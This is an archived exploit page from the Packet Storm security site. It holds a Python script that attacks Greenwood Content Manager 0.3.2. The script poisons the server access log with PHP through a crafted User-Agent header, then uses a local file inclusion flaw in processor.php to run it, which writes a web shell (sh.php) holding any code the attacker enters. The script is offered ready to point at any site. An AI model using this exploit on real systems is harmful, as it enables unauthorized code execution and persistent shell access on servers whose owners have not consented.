exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Greenwood Content Manager Code Execution

Greenwood Content Manager Code Execution
Posted Jul 15, 2009
Authored by IRCRASH | Site ircrash.com

Greenwood Content Manager version 0.3.2 remote code execution exploit that leverages a local file inclusion vulnerability.

tags | exploit, remote, local, code execution, file inclusion
SHA-256 | 2cce22ddb37dc2631b21740feb15e3a71a41f28257f486fbe4680121708acde5

Greenwood Content Manager Code Execution

Change Mirror Download
#!usr/bin/python
#####################################################################################
#### Greenwood Content Manager Remote Code Execution ####
#####################################################################################
# #
#AUTHOR : Sina Yazdanmehr (R3d.W0rm) #
#Discovered by : Sina Yazdanmehr (R3d.W0rm) #
#Our Site : http://ircrash.com #
#My Official WebSite : http://r3dw0rm.ir #
#IRCRASH Team Members : Khashayar Fereidani - R3d.w0rm (Sina Yazdanmehr) #
#####################################################################################
# #
#Download : http://garr.dl.sourceforge.net/sourceforge/greenwood/greenwood-release-0.3.2.tar.bz2
# #
#Dork : :( #
# #
#####################################################################################
# [Bug] #
# #
#http://[site]/[path]/include/processor.php?content_path=[evil_code_path] #
# #
###################################### TNX GOD ######################################
import sys,httplib,urllib
if len(sys.argv) < 3 :
print "\n\rUsage : " + sys.argv[0] + " [site] [path]\n\r"
print "Ex : " + sys.argv[0] + " 123.com /greenwood/\n\r"
print "Powered by : Sina Yazdanmehr( R3d.W0rm )\n\r"
print "http://IrCrash.com - http://R3dW0rm.ir\n\r"
exit()
if 'http://' in sys.argv[1] :
sys.argv[1]=sys.argv[1].replace('http://','')
print "Input evil code.( With out ' and <??> )( Ex. include $_GET[file]; )\n\r"
shell=raw_input('Code : ')
user_agent={'User-Agent':'<?php fwrite($fp=fopen("../var/sh.php","w+"),\'<?php /* Exploited by : R3d.W0rm - http://r3dw0rm.ir */ ' + shell + '?>\');fclose($fp); ?>'}
conn=httplib.HTTPConnection(sys.argv[1],80)
conn.request("POST",'/' + sys.argv[2] + '/','',user_agent)
response=conn.getresponse().read()
urllib.urlopen('http://' + sys.argv[1] + '/' + sys.argv[2] + '/include/processor.php?content_path=../var/access_log')
print "\n\rShell created : http://" + sys.argv[1] + sys.argv[2] + "/var/sh.php\n\r"


Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    8 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    11 Files
  • 23
    Apr 23rd
    68 Files
  • 24
    Apr 24th
    23 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close